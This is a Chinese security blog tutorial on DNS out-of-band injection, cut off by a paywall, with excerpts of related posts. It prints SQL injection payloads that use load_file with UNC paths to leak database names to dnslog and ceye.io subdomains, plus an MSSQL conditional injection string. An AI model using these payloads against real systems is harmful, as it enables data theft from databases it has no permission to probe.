dns带外注入

已于 2022-02-10 18:24:02 修改
阅读量3.1k 收藏 9
点赞数 1
分类专栏: web漏洞 文章标签: 服务器 安全 http web安全
于 2021-12-20 16:06:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36375207/article/details/122041212
版权
DNS带外注入是一种在web漏洞无回显情况下,通过DNS日志获取查询内容的技术。本文介绍DNS带外注入的概念,常用的dnslog平台,并通过联合sql盲注、xss、命令执行和xxe、ssrf的实例展示其应用,帮助安全研究人员更有效地利用这种技术。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

 前言

一、DNS带外注入是什么?

二、dnslog的常见平台

三、实战

1. 联合sql盲注

2.联合xss

 3.命令执行

4.xxe和ssrf

总结

参考资料



 

 前言

        我们常见的sql注入、xss、xxe、ssrf等web漏洞都会存在无回显的情况,为了更方便的获取到查询的内容,因此有了DNS带外注入。


一、DNS带外注入是什么?

        DNS即域名解析协议,用于ip和域名之间的相互解析,而dnslog就是记录了你对此域名或者ip的访问信息(即日志记录),在上述漏洞的盲注中,我们将查询结果拼接到dns服务器域名上面进行请求,那么dns服务器就会收到拼接后的字符串,也就看到了回显的结果,完成盲注。




二、dnslog的常见平台

http://www.dnslog.cn
http://admin.dnslog.link
http://ceye.io

三、实战

1. 联合sql盲注

        如某个注入点为?id=1,则在之后拼接上and if((select load_file(concat('\\\\',(select database()),'.xxxx.ceye.io\\aaa'))),1,1)--+,然后就可以在ceye服务器上接收到需要查询的数据,需要注意的是这里的数据库权限必须有load_file权限,最好是root,可以用show global variables like '%secure%',secure_file_priv必须为空才能读取文件,为null则不能读取文件

最低0.47元/天 解锁文章
mysql dns 注入_数据库DNSLog注入-总结
weixin_29279047的博客
01-19 1062
sql注入中利用的骚姿势你又知道几个?DNSLog注入和DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫注入,自我感觉,比较顺口为什么需要注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据出。of course!这里主讲DNSlog注...
sql注入——dns带外注入
cxrpty的博客
02-10 3734
以sql labs8为例 1.搜索dns.log在线软件,并get一个域名 2.在cmd中ping该域名,发现解析成功 3.在sql labs8中输入http://localhost/sqli-labs-master/Less-8/?id=1' and load_file("\\\\sss.cipv66.dnslog.cn\\xxx.txt") -- -,并执行 4.在dn...
写bat脚本双击执行
qq_35911118的博客
04-08 3136
@echo off           不显示后续命令行及当前命令行 dir c:*.* >a.txt       将c盘文件列表写入a.txt call c:\ucdos\ucdos.bat    调用ucdos echo 你好            显示"你好" pause              暂停,等待按键继续 rem 准备运行wps         注释:准备运行wps cd ucdos            进入ucdos目录 wps               运行wps @echo
DNS数据
最新发布
2301_78866120的博客
04-02 931
DNS数据
DNS注入
weixin_52501704的博客
10-09 1661
DNS注入
SQL注入之DNSLog注入
dragon的博客
02-21 3333
什么是dnslog呢?DNS就是域名解析服务,把一个域名转换成对应的IP地址,转换完成之后,DNS服务器就会有一个日志记录本次转换的时间、域名、域名对应的ip、请求方的一些信息,这个日志就叫DNSLog。但是想要查看DNSLog信息的人,必须是拥有DNS服务器权限的人,这就使的我们要是用dnslog注入方法的话,就需要搭建自己的一个dns服务器,成本相对较高。所以在此就推荐两个平台,可以快速让我们使用dnslog注入也可以使用BurpSuite同样可以实现相应功能。
数据库——DNS注入
希望我的博客,能帮上你解决学习中工作中所遇到的问题
05-14 1277
Mysql注入——DNS注入 靶场地址 原理:利用UNC路径去访问服务器dns会有日志,通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录,此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志 1.,我们看到靶场,首先尝试最简单的get传参,注入 它是直接将id传参拼接进去,然后用mysqli_connect()函数进行针对数据库的查询,我们顺理成章再后面输入内容?id=1进行测试 页面正常,继续
30、WEB攻防——通用漏洞&SQL注入&CTF&二次&堆叠&DNS
qq_55202378的博客
01-21 594
假如在注册用户的时候,需要填用户名、邮箱和密码,登录使用邮箱和密码,登陆上去后会显示用户名,后台为什么知道你的用户名,就可能是使用SQL语句,通过你的邮箱和密码查询到用户名。假如用户名是SQL语句,会在插入的时候就执行SQL语句,然后显示。这就是二次注入的基本原理。应用程序:解决不回显、反向连接(DNS协议一般不被禁用)、SQL注入、命令执行、SSRF等。这个函数),某k真辣鸡,整这么些花里胡哨的。填写表单,保存数据默认会更新所有数据。在mysql中,支持16进制编码。
DNS_LOG注入
学习、分享、交流
05-19 1717
DNSLOG注入:利用DNS解析,日志记录把数据库里面的内容给出来···
DNS注入SQLMAP
qq_31088019的博客
08-06 645
dns数据
dns缓存
qq_35543858的博客
01-25 840
查看dns缓存 ipconfig/displaydns 清除dns缓存 ipconfig/flushdns DNS缓存介绍 记录种类 A记录是指定域名对应的IP地址。 AAAA记录一个域名对应的IPv6地址 NS记录 是指定由哪个DNS服务器解析你的域名。 MX记录 是指邮件交换记录,记录了在当前网络下,存在的mail服务器 CNAME记录 是指别名记录,允许多个域名对应一个ip ...
渗透测试---手把手教你SQL注入(4)--DNSLOG注入
weixin_52796034的博客
10-10 1207
通常我们面对SQL注入过程中没有回显的情况时,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,需要花费大量时间进行测试,并且还可能需要对目标服务器发送大量请求,这会导致我们的IP容易被目标服务器封掉.
DNSlog原理及注入分析
热门推荐
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
SQL注入--DNSlog注入--理论
m0_56019217的博客
11-23 1027
DNS的作用是将域名解析为IP而DNSlog就是存储在DNS服务器上的域名信息,它记录着用户对域名访问信息。可以理解为DNS服务器上的日志文件。比如,以点为分隔,从右向左依次是顶级域名、二级域名、三级域名。即,net是顶级域名,csdn是二级域名,blog是三级域名。域名不区分大小写。在进行ping命令时会使用DNS解析:这里就是被解析后,与csdn.com进行了拼接,然后再去执行Ping命令。这里我们界面就回显得到了,也就是得到了的值。这个过程就可以被称为DNSlog
DNSlog数据注入
C_LCH_2000的博客
08-04 1579
盲注代替 DNS log即DNS日志,域名解析的记录。
MySQL注入 — Dns 注入
baimaozi008的博客
05-29 1197
本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全来的经济损失。通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。然后1806dl.dnslog.cn的子域名的解析都是在某台服务器,然后他记录下来了有人请求访问了error.1806dl.dnslog.cn,然后在DnsLog这个平台上面显示出来了。
dnslog是什么
来而不往非礼也
05-14 1812
在看hw面经的时候发现了dnslog的相关的知识点,有点迷惑,所以写下这篇文章记录,方便日后查阅。
DNSlog回显
震山的博客
10-11 1171
一个利用 DNSlog 进行 Sql 注入的笔记
带外注入
03-08
### 关于带外注入安全漏洞与攻击方式 带外注入(Out-of-Band Injection),作为一种特殊的SQL注入技术,在某些特定条件下可以绕过传统的基于布尔或时间延迟的盲注方法。当目标应用程序既不会直接回显查询结果也不会因错误而泄露任何有用的信息时,传统盲注变得低效甚至不可行。 #### 特征描述 在这种类型的注入中,攻击者能够迫使数据库服务器部系统发送请求以传递数据。这种机制依赖于数据库支持的功能特性,比如DNS解析功能或者HTTP客户端库等[^3]。例如,Microsoft SQL Server可以通过`xp_dirtree`命令发起对部资源的访问;Oracle Database则可能利用UTL_HTTP包实现相同目的。 #### 实现原理 为了触发一次成功的带外注入攻击,通常需要满足以下几个条件: - 数据库管理系统具备网络通信能力; - 应用程序逻辑允许输入未经过充分验证的数据进入SQL语句构建流程; - 存在一个可预测且稳定的通道用于接收来自数据库发出的消息。 一旦上述前提成立,则可通过构造特殊形式的恶意输入来诱导数据库执行有网络调用的操作,并最终将敏感信息传输给由攻击者控制的服务端点。 ```sql -- 假设存在一个易受攻击的Web应用接口接受用户ID作为参数并将其嵌入到如下所示的SELECT语句内: ' OR 1=CASE WHEN (ASCII(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1,1))>97) THEN HOST_NAME() ELSE 'a' END -- ``` 此代码片段试图读取表名的第一个字符并通过内置函数HOST_NAME()尝试建立连接至远程主机。如果该字符大于'a'(即ASCII码值为97),则会形成有效的域名查询请求指向攻击者的监听器地址。 #### 风险评估 由于此类攻击往往涉及跨网段的信息交换活动,因此不仅限于窃取本地存储的数据记录,还可能导致更广泛的内部网络安全威胁扩散开来。此,因为涉及到实际的互联网流量交互行为,所以更容易被IDS/IPS设备捕捉识别从而留下痕迹证据。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值